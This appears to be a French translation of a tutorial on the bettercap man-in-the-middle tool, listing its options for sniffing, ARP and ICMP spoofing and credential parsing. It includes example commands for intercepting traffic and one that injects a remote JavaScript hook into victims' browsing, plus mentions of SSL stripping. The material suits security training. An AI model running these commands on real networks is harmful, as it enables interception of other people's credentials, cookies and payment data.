Bettercap et fonctionalités

Renifler le trafic réseau est l'une des compétences fondamentales du professionnel de la sécurité. Par le passé, ettercap était la pour le faire mais il a fait son temps et a maintenant un successeur : bettercap

#Bettercap est comme #ettercap mais mieux construit. Ce docu vous aidera à vous familiariser et vous montrera comment utiliser ses fonctions principales.

Installation

gem install bettercap

Voilà, c'est à peu près tout, sauf si votre installation Ruby est cassé. Vous aurez donc besoin de Ruby.

Comme avec la plupart des outils, il y a quelques commutateurs différents disponibles.

Principal

Les options de  base :

  • -T : spécifiez les cibles MiTM (IP ou MAC)
  • -I : interface à utiliser
  • -G : spécifie l'adresse de la passerelle (généralement automatique)
  • --no-discovery : ne recherche pas d'hôtes (utilise le cache ARP)
  • --ignore : ignore ADDRESS1, ADDRESS2
  • --check-updates : vérifier les mises à jour
  • -h : obtenez de l'aide sur les options

GUI - Interface

Il y a quelques options d'interface graphique différentes, mais le mode par défaut ne correspond pas à ceci.

  • -C : utiliser une interface graphique
  • -D : désactiver l'interface graphique (mode démon)

Renifler - Sniffing

Renifler (sniffing) est différent de l'usurpation d'identité (spoofing). La différence fondamentale est que reniflement est passif et que l'usurpation est active.

Renifler permet de comprendre comme le protocole est disséqué afin de voir les informations d'identification et autres infos. Il est évidemment plus puissant lorsqu'il est combiné avec de l’usurpation et si vous êtes en mode usurpation, vous obtenez d'autres avantages et informations supplémentaires.

  • -X : activer le mode renifleur
  • -L : sniff de votre hôte aussi (par défaut est : seulement d'autres hôtes)
  • --sniffer-source : spécifie un FICHIER que à utiliser
  • --sniffer-output : spécifie un FICHIER dans lequel on écrit
  • --sniffer-filter : disséquer seulement pour ce filtre BPF
  • -P : liste des parseurs à utiliser (COOKIE, CREDITCARD, DHCP, DICT, FTP, HTTPAUTH, HTTPS, IRC, MAIL, MPD, MYSQL, NNTP, NTLMMS, PGSWL, POST, REDIS, RLOGIN, SNMP, SNPP, URL, WHATSAPP ). La valeur par défaut est tout.

Usurpation - Spoofing

L'usurpation d'identité est l'acte d'usurper l'identité des hôtes sur le réseau par le biais de diverses méthodes, ce qui fait que ces hôtes vous envoient le trafic plutôt que la destination réelle. C'est le cœur de tout outil MiTM.

Pour cette raison, le commutateur -S est implicite lorsque vous exécutez bettercap sans aucune option. Vous utilisez explicitement le commutateur -S afin de définir la méthode de reniflage à utiliser.

  • -S : spoof utilisant ARP, ICMP, NONE (par défaut est ARP)
  • --kill : tue les connexions pour toutes les cibles actuelles
  • - half-duplex : fonctionne lorsque le routeur n'est pas MiTMable

Enregistrement - logging

--Log : enregistrer les infos quelque part
--silent : enregistre les infos sans affichage du terminal
--log-timestamp : ajoute un horodatage aux journaux

Exemples

Voici quelques exemples basés sur des cas d'utilisation.

Renifler le trafic

Renifler permettra a tout le trafic visible et vous dira s'il voit des informations d'identification ou des activités sensibles sur ces protocoles, par exemple :

  • Mots de passe en texte clair sur HTTP, FTP, POP, IMAP, SMTP (beaucoup plus)
  • Données de carte de crédit
  • Cookies
  • Connexions de base
  • URL
  • Applications de conversation
  • Etc…

Cela montre essentiellement les choses que vous ne devriez pas voir sur un réseau sécurisé. Permet de voir tout le trafic qui transite sur votre carte réseau comme par exemple, sur un réseau sans fil lorsque vous êtes en mode promiscuité.

Reniflage basic

le -X vous met en mode sniffing (pas activé par défaut) et --no-spoofing vous évite d'inonder le réseau pour que MiTM soit accessible à tous. Une façon de regarder autour sans être trop bruyant ou perturbateur.

# sans usurpation (no spoofing), mais vous ne pourrez pas voir votre propre réseau

bettercap -X –no-spoofing

Si vous souhaitez également voir votre propre trafic, ajoutez le commutateur -L.

# sans usurpation (no spoofing), incluant votre propre réseau

bettercap -XL –no-spoofing

Trafic de spoofing

Ok donc c'était le truc doux. Maintenant, interceptons le trafic.

# Paramètres par défaut, usurpation d'identité mais pas de décodage

sudo bettercap

MiTM + renifler

Maintenant ajoutez Sniffing (décodage et recherche de contenu sensible).

# MiTM plus Sniffing (vous devrez toujours ajouter sudo )

bettercap -X

MiTM + décodage de protocole spécifique

# MiTM à la recherche de HTTPS

bettercap -XP HTTPS

MiTM + Journalisation

# Journalisation de base

bettercap -log LOG_FILE

MiTM + enregistrement silencieux

# Journalisation silencieuse

bettercap -log LOG_FILE -silent

Avancée

Proxing Bettercap ne peut pas seulement intercepter le trafic, mais interagir avec lui. En utilisant cela, vous pouvez faire des choses comme :

bettercap -proxy-module -js-url http://192.168.10.25:3100/hook.js

Vous pouvez bien sûr le faire aussi pour certaines machines, en utilisant les options décrites ci-dessus. 2. Defeating Encryption : En utilisant la fonctionnalité --proxy-module , vous pouvez faire toutes sortes de choses qui vous permettent de voir le trafic crypté, de SSLSTRIP (et ses versions améliorées) à l'émulation d'autorité de certification.

Résumé

Bettercap est un outil dont vous devez connaître si vous êtes dans la sécurité informatique ou si vous êtes simplement intéressé à être techniquement conscient de ce qui est possible de faire.

 

Cette page est une traduction de la page du site de Daniel Miessler

©2019 MediaNETPro

CONTACTEZ-NOUS

Nous ne sommes pas là pour le moment. Vous pouvez nous envoyer un e-mail et nous reviendrons vers vous dès que possible.

En cours d’envoi
s2Member®

Vous connecter avec vos identifiants

ou    

Vous avez oublié vos informations ?

Create Account